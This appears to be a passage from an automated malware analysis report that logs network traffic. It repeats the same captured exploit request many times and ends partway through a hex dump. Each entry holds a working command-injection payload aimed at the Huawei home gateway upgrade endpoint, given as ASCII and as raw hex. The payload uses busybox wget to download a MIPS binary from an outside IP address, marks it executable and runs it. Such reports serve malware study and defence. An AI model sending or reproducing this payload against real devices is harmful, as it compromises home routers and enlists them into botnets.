0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 